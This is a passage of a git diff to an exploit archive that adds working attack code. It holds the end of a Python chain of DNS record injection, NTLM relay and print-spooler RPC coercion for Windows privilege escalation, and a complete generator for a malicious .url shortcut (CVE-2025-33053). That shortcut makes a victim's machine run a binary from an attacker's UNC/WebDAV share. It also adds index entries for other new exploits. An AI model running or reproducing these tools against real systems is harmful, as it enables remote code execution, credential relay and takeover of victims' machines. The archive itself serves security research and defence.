except socket.gaierror:
|
||||||
|
time.sleep(2)
|
||||||
|
print("[!] DNS record did not propagate or resolve.")
|
||||||
|
return False
|
||||||
|
|
||||||
|
def start_ntlmrelay(target):
|
||||||
|
print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
|
||||||
|
try:
|
||||||
|
subprocess.Popen([
|
||||||
|
"impacket-ntlmrelayx", "-t", target, "--no-smb-server"
|
||||||
|
])
|
||||||
|
print("[*] NTLM relay server started.")
|
||||||
|
except Exception as e:
|
||||||
|
print(f"[!] Failed to start NTLM relay server: {e}")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def trigger_coercion(victim_ip, fake_host):
|
||||||
|
print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
|
||||||
|
cmd = [
|
||||||
|
"rpcping",
|
||||||
|
"-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
|
||||||
|
"-s", fake_host,
|
||||||
|
"-e", "1234",
|
||||||
|
"-a", "n",
|
||||||
|
"-u", "none",
|
||||||
|
"-p", "none"
|
||||||
|
]
|
||||||
|
try:
|
||||||
|
subprocess.run(cmd, check=True)
|
||||||
|
print("[+] Coercion RPC call sent successfully.")
|
||||||
|
except subprocess.CalledProcessError:
|
||||||
|
print("[!] RPC coercion failed. Verify victim connectivity and service status.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def main():
|
||||||
|
parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
|
||||||
|
parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
|
||||||
|
parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
|
||||||
|
parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
|
||||||
|
parser.add_argument("--target", required=True, help="Target system to relay authentication to")
|
||||||
|
parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
record = "relaytrigger"
|
||||||
|
fqdn = f"{record}.{args.dc_fqdn}"
|
||||||
|
|
||||||
|
inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
|
||||||
|
if not check_record(fqdn):
|
||||||
|
print("[!] DNS verification failed, aborting.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
start_ntlmrelay(args.target)
|
||||||
|
time.sleep(5) # Wait for relay server to be ready
|
||||||
|
|
||||||
|
trigger_coercion(args.victim_ip, fqdn)
|
||||||
|
|
||||||
|
print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
62
exploits/windows/remote/52334.NA
Normal file
62
exploits/windows/remote/52334.NA
Normal file
|
@ -0,0 +1,62 @@
|
||||||
|
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
|
||||||
|
Date: June 2025
|
||||||
|
Author: Dev Bui Hieu
|
||||||
|
Tested on: Windows 10, Windows 11
|
||||||
|
Platform: Windows
|
||||||
|
Type: Remote
|
||||||
|
CVE: CVE-2025-33053
|
||||||
|
|
||||||
|
Description:
|
||||||
|
This exploit leverages the behavior of Windows .URL files to execute a
|
||||||
|
remote binary over a UNC path. When a victim opens or previews the .URL
|
||||||
|
file (e.g. from email), the system may automatically reach out to the
|
||||||
|
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
|
||||||
|
execution without prompt.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
python3 gen_url.py --ip 192.168.1.100 --out doc.url
|
||||||
|
```
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
|
||||||
|
content = f"""[InternetShortcut]
|
||||||
|
URL={url_target}
|
||||||
|
WorkingDirectory={working_directory}
|
||||||
|
ShowCommand=7
|
||||||
|
IconIndex={icon_index}
|
||||||
|
IconFile={icon_file}
|
||||||
|
Modified={modified}
|
||||||
|
"""
|
||||||
|
with open(output_file, "w", encoding="utf-8") as f:
|
||||||
|
f.write(content)
|
||||||
|
print(f"[+] .url file created: {output_file}")
|
||||||
|
|
||||||
|
def main():
|
||||||
|
parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
|
||||||
|
|
||||||
|
parser.add_argument('--out', default="bait.url", help="Output .url file name")
|
||||||
|
parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
|
||||||
|
parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
|
||||||
|
parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
|
||||||
|
help="Target executable path on victim machine")
|
||||||
|
parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
|
||||||
|
help="Icon file path")
|
||||||
|
parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
|
||||||
|
parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
working_directory = fr"\\{args.ip}\{args.share}\\"
|
||||||
|
|
||||||
|
generate_url_file(
|
||||||
|
output_file=args.out,
|
||||||
|
url_target=args.exe,
|
||||||
|
working_directory=working_directory,
|
||||||
|
icon_file=args.icon,
|
||||||
|
icon_index=args.index,
|
||||||
|
modified=args.modified
|
||||||
|
)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
|
@ -5208,6 +5208,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,,2021-06-10,2021-10-28,0,,,,,,
|
49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,,2021-06-10,2021-10-28,0,,,,,,
|
||||||
38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios,,2013-07-09,2015-11-05,1,,,,,,https://www.securityfocus.com/bid/61081/info
|
38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios,,2013-07-09,2015-11-05,1,,,,,,https://www.securityfocus.com/bid/61081/info
|
||||||
34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios,,2014-08-24,2014-08-24,0,OSVDB-110474;OSVDB-110446;OSVDB-110445,,,,,
|
34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios,,2014-08-24,2014-08-24,0,OSVDB-110474;OSVDB-110446;OSVDB-110445,,,,,
|
||||||
|
52333,exploits/ios/remote/52333.py,"AirKeyboard iOS App 1.0.5 - Remote Input Injection",2025-06-15,"Chokri Hammedi",remote,ios,,2025-06-15,2025-06-15,0,CVE-n/a,,,,,
|
||||||
42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios,,2017-10-17,2017-10-17,1,CVE-2017-7115,,OneRing,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
|
42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios,,2017-10-17,2017-10-17,1,CVE-2017-7115,,OneRing,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3
|
||||||
42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios,,2017-09-25,2017-09-27,1,CVE-2017-11120,"Out Of Bounds",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
|
42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios,,2017-09-25,2017-09-27,1,CVE-2017-11120,"Out Of Bounds",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
|
||||||
39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,,2014-03-10,2015-12-28,1,CVE-2013-6835;OSVDB-104272,,,,,https://www.securityfocus.com/bid/66108/info
|
39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,,2014-03-10,2015-12-28,1,CVE-2013-6835;OSVDB-104272,,,,,https://www.securityfocus.com/bid/66108/info
|
||||||
|
@ -10549,6 +10550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,,2004-01-28,2012-12-23,1,CVE-2004-2134;OSVDB-20189,,,,,https://www.securityfocus.com/bid/9515/info
|
23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,,2004-01-28,2012-12-23,1,CVE-2004-2134;OSVDB-20189,,,,,https://www.securityfocus.com/bid/9515/info
|
||||||
21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple,,2002-02-07,2012-09-12,1,CVE-2002-1731;OSVDB-27079,,,,,https://www.securityfocus.com/bid/4059/info
|
21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple,,2002-02-07,2012-09-12,1,CVE-2002-1731;OSVDB-27079,,,,,https://www.securityfocus.com/bid/4059/info
|
||||||
43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2017-18016,,,,,https://github.com/tintinweb/pub/tree/352d69d518b9b9c0f4983f1254418f0e9755cbb2/pocs/cve-2017-18016
|
43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2017-18016,,,,,https://github.com/tintinweb/pub/tree/352d69d518b9b9c0f4983f1254418f0e9755cbb2/pocs/cve-2017-18016
|
||||||
|
52329,exploits/multiple/local/52329.py,"Parrot and DJI variants Drone OSes - Kernel Panic Exploit",2025-06-15,"Mohammed Idrees Banyamer",local,multiple,,2025-06-15,2025-06-15,0,CVE-2025-37928,,,,,
|
||||||
16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple,,2010-09-20,2016-10-27,1,CVE-2009-2261;OSVDB-54966,"Metasploit Framework (MSF)",,,http://www.exploit-db.compeazip-2.6.1.WINDOWS.exe.zip,
|
16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple,,2010-09-20,2016-10-27,1,CVE-2009-2261;OSVDB-54966,"Metasploit Framework (MSF)",,,http://www.exploit-db.compeazip-2.6.1.WINDOWS.exe.zip,
|
||||||
22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple,,2002-02-22,2012-10-27,1,,,,,,https://www.securityfocus.com/bid/6909/info
|
22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple,,2002-02-22,2012-10-27,1,,,,,,https://www.securityfocus.com/bid/6909/info
|
||||||
7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple,,2008-12-16,,1,OSVDB-53573,,,,,
|
7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple,,2008-12-16,,1,OSVDB-53573,,,,,
|
||||||
|
@ -12386,6 +12388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
|
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
|
||||||
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
|
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
|
||||||
33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
|
33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
|
||||||
|
52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,,
|
||||||
49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
|
49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
|
||||||
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
|
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
|
||||||
49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
|
49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
|
||||||
|
@ -14238,7 +14241,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
|
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
|
||||||
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
|
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
|
||||||
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
|
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
|
||||||
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,,
|
52327,exploits/php/webapps/52327.txt,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-06-15,/bin/neko,webapps,php,,2025-06-15,2025-06-15,0,CVE-2025-46041,,,,,
|
||||||
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
|
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
|
||||||
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
|
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
|
||||||
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
|
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
|
||||||
|
@ -22953,6 +22956,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,,
|
17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,,
|
||||||
26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info
|
26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info
|
||||||
52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-04-13,0,CVE-2024-44000,,,,,
|
52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-04-13,0,CVE-2024-44000,,,,,
|
||||||
|
52328,exploits/php/webapps/52328.py,"Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation",2025-06-15,"Milad karimi",webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-28000,,,,,
|
||||||
11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz,
|
11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz,
|
||||||
49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,,
|
49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,,
|
||||||
25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info
|
25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info
|
||||||
|
@ -26362,6 +26366,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php,,2011-05-20,2011-05-20,0,,,SOS-11-007.zip,,,http://www.senseofsecurity.com.au/advisories/SOS-11-007.pdf
|
17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php,,2011-05-20,2011-05-20,0,,,SOS-11-007.zip,,,http://www.senseofsecurity.com.au/advisories/SOS-11-007.pdf
|
||||||
13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php,,2010-06-05,,1,,,,,,
|
13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php,,2010-06-05,,1,,,,,,
|
||||||
11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php,,2010-02-02,,1,OSVDB-62088;CVE-2010-0631,,,,,
|
11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php,,2010-02-02,,1,OSVDB-62088;CVE-2010-0631,,,,,
|
||||||
|
52331,exploits/php/webapps/52331.py,"PHP CGI Module 8.3.4 - Remote Code Execution (RCE)",2025-06-15,İbrahimsql,webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-4577,,,,,
|
||||||
14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php,,2010-07-20,2010-07-27,1,,,,,http://www.exploit-db.comphp_chat_for_123flashchat.zip,
|
14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php,,2010-07-20,2010-07-27,1,,,,,http://www.exploit-db.comphp_chat_for_123flashchat.zip,
|
||||||
34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php,,2010-06-02,2014-07-16,1,,,,,,https://www.securityfocus.com/bid/40532/info
|
34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php,,2010-06-02,2014-07-16,1,,,,,,https://www.securityfocus.com/bid/40532/info
|
||||||
18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php,,2011-12-07,2011-12-07,1,OSVDB-78091,,,,,
|
18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php,,2011-12-07,2011-12-07,1,OSVDB-78091,,,,,
|
||||||
|
@ -41052,6 +41057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/
|
18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/
|
||||||
18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
|
18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
|
||||||
40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
|
40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
|
||||||
|
52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,,
|
||||||
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
|
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
|
||||||
51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,,
|
51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,,
|
||||||
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
|
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
|
||||||
|
@ -45191,9 +45197,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
||||||
38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21,2015-08-31,2016-10-31,1,CVE-2013-4730;OSVDB-94624,,,http://www.exploit-db.com/screenshots/idlt38500/38013.png,http://www.exploit-db.comPCMan.7z,
|
38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21,2015-08-31,2016-10-31,1,CVE-2013-4730;OSVDB-94624,,,http://www.exploit-db.com/screenshots/idlt38500/38013.png,http://www.exploit-db.comPCMan.7z,
|
||||||
40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows,,2016-11-04,2016-11-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-04-at-122818.png,http://www.exploit-db.comPCMan.7z,
|
